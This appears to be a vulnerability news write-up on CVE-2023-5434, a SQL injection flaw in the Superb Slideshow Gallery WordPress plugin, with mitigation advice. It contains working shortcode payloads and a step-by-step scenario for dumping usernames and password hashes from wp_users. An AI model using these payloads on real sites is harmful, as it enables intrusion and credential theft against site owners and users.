CVE CyberSecurity Database News

CVE-2023-5434 - SQL Injection Vulnerability in Superb Slideshow Gallery WordPress Plugin (<= 13.1)

Poster -

---

CVE-2023-5434 is a serious vulnerability affecting the popular "Superb Slideshow Gallery" WordPress plugin up to version 13.1. This flaw makes it possible for attackers with even the lowest-level authenticated account (subscriber) to execute SQL injection attacks—potentially exposing all the database content of a WordPress site, including user emails, password hashes, and other sensitive information.

What is SQL Injection?

SQL Injection is a type of security vulnerability where an attacker can insert or "inject" malicious SQL queries into an application's database query. If successful, the attacker can read sensitive data, modify or even delete whole databases.

Root Cause

In the Superb Slideshow Gallery plugin, certain shortcodes are designed to accept parameters from users. However, up until version 13.1, these parameters are not properly escaped or sanitized before being added directly to SQL queries.

Here’s the issue in plain English: If you can submit a parameter through the plugin’s shortcode, you can also submit SQL code—because the plugin doesn’t check or clean up what you’ve entered.

Imagine the plugin code does something like this

$gallery_id = $_GET['gallery_id'];
$sql = "SELECT * FROM wp_slideshow_gallery WHERE gallery_id = $gallery_id";
$results = $wpdb->get_results($sql);

If $gallery_id is not properly escaped or prepared, an attacker could submit

[superb_slideshow_gallery gallery_id="1 OR 1=1"]

Or even more dangerously

[superb_slideshow_gallery gallery_id="1 UNION SELECT user_login, user_pass FROM wp_users--"]

Realistic Attack Scenario

Let’s say an attacker has a Subscriber account on the affected website. They craft a malicious post or page using the plugin's shortcode, like:

[superb_slideshow_gallery gallery_id="1 UNION ALL SELECT user_login, user_pass, '', '', '', '', '', '', '', '' FROM wp_users-- "]

When this shortcode is processed, the database query would look like

SELECT * FROM wp_slideshow_gallery WHERE gallery_id = 1 UNION ALL SELECT user_login, user_pass, '', '', '', '', '', '', '', '' FROM wp_users--

This would return all usernames and password hashes from the wp_users table, displaying them (or a subset) wherever the gallery is shown.

Step 1: Login as a Subscriber

Get a subscriber-level account (even by registering, if open).

Insert the following shortcode in the body

[superb_slideshow_gallery gallery_id="1 UNION SELECT user_login, user_pass, '', '', '', '', '', '', '', '' FROM wp_users-- "]

Step 3: View the Post

When the page is viewed, it will include usernames and hashed passwords in the output, depending on how the plugin formats its gallery data.

Site integrity: Possible follow-on attacks, such as privilege escalation

## Solution / Mitigation

- Update: Upgrade to the latest version of Superb Slideshow Gallery where this vulnerability has been patched (check plugin page for up-to-date info).
- Restrict Access: Only allow trusted users to create posts/pages. Remove open registration if not needed.

References

- Wordfence Advisory Post
- WPScan Vulnerability Entry
- Official Plugin Page
- CVE Entry at NVD *(May update as CVE details are published)*

Final Thoughts

Even simple plugins can be a doorway to serious breaches if they mishandle user input. For site owners: Always keep your plugins updated, never trust user input, and review your security regularly.

Is your site using Superb Slideshow Gallery? Update immediately or consider a safer alternative.

Timeline

Published on: 10/31/2023 09:15:08 UTC
Last modified on: 11/07/2023 04:24:00 UTC